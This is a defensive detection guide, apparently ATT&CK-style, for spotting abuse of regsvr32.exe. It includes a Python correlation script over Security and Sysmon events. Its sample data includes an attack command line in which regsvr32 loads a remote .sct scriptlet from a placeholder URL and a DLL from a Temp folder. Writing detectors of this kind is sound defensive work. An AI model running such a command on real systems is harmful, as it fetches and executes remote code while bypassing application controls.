Detection focuses on regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. The correlated sequence is regsvr32.exe process creation, followed by a module load of the DLL or scriptlet, and optionally outbound network traffic from the same process.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |

| Field | Description |
|---|---|
| AllowedDLLPaths | Directories where DLL loading via regsvr32.exe is expected (e.g., C:\Windows\System32). |
| ScriptletExtensions | File extensions considered suspicious when executed by regsvr32.exe (e.g., .sct, .ocx). |
| TimeWindow | Timeframe to correlate regsvr32.exe process creation with subsequent module loads and network connections. |
| ParentProcessWhitelist | Parent processes from which regsvr32.exe is expected (e.g., explorer.exe during legitimate COM object registration). |
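The correlation described above, with the four tunable fields from the table applied, as an added example (not part of the original strategy page). The events are constructed samples normalised to one flat schema; the Security 4688 NewProcessId is assumed to have been mapped onto a common `ProcessId` field so it can be joined with Sysmon events, and the parameter values are assumptions.

```python
from datetime import datetime, timedelta

# Tunable parameters from the field table (values assumed for this example)
ALLOWED_DLL_PATHS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPTLET_EXTENSIONS = (".sct", ".ocx")
TIME_WINDOW = timedelta(minutes=5)
PARENT_PROCESS_WHITELIST = ("explorer.exe",)
def _base(p): return p.lower().rsplit("\\", 1)[-1]  # lower-cased file-name component
def _unexpected_path(p): return not p.lower().startswith(ALLOWED_DLL_PATHS)

def launch_reasons(ev):
    """Security 4688 checks: unexpected parent, remote URL, scriptlet, DLL outside allowed paths."""
    reasons = []
    if _base(ev["ParentImage"]) not in PARENT_PROCESS_WHITELIST:
        reasons.append("parent " + _base(ev["ParentImage"]))
    for tok in ev["CommandLine"].split():
        t = tok.lower()
        if "http://" in t or "https://" in t:
            reasons.append("remote reference " + tok)
        elif t.endswith(SCRIPTLET_EXTENSIONS):
            reasons.append("scriptlet " + tok)
        elif t.endswith(".dll") and _unexpected_path(t):
            reasons.append("dll outside allowed paths " + tok)
    return reasons

def correlate(events):
    """Join Sysmon 7 (module load) and 3 (network) events to each regsvr32 launch by PID within TIME_WINDOW."""
    alerts = []
    for launch in (e for e in events if e["EventCode"] == 4688 and _base(e["Image"]) == "regsvr32.exe"):
        t0, reasons = datetime.fromisoformat(launch["UtcTime"]), launch_reasons(launch)
        for ev in events:
            t = datetime.fromisoformat(ev["UtcTime"])
            if ev["ProcessId"] != launch["ProcessId"] or not t0 <= t <= t0 + TIME_WINDOW:
                continue
            if ev["EventCode"] == 7 and (_unexpected_path(ev["ImageLoaded"]) or ev["Signed"] != "true"):
                reasons.append("module " + ev["ImageLoaded"])
            elif ev["EventCode"] == 3:
                reasons.append("network " + ev["DestinationIp"])
        if reasons:
            alerts.append({"ProcessId": launch["ProcessId"], "reasons": reasons})
    return alerts

# Constructed sample events: one benign COM registration from explorer.exe, one suspicious chain
SAMPLE_EVENTS = [
    {"EventCode": 4688, "UtcTime": "2024-05-01T10:00:00", "ProcessId": 1001, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"},
    {"EventCode": 7, "UtcTime": "2024-05-01T10:00:01", "ProcessId": 1001, "ImageLoaded": "C:\\Windows\\System32\\msxml3.dll", "Signed": "true"},
    {"EventCode": 4688, "UtcTime": "2024-05-01T11:00:00", "ProcessId": 2002, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "CommandLine": "regsvr32.exe /s /i:http://updates.example.invalid/update.sct C:\\Users\\bob\\AppData\\Local\\Temp\\helper.dll"},
    {"EventCode": 7, "UtcTime": "2024-05-01T11:00:02", "ProcessId": 2002, "ImageLoaded": "C:\\Users\\bob\\AppData\\Local\\Temp\\helper.dll", "Signed": "false"},
    {"EventCode": 3, "UtcTime": "2024-05-01T11:00:03", "ProcessId": 2002, "DestinationIp": "203.0.113.5"},
]
```

Running `correlate(SAMPLE_EVENTS)` yields a single alert for PID 2002 listing the unexpected parent, the remote /i reference, the DLL in a temp directory, the unsigned module load and the outbound connection; the benign launch produces no alert. Because Windows PIDs are reused, the join is bounded by TimeWindow rather than by PID alone.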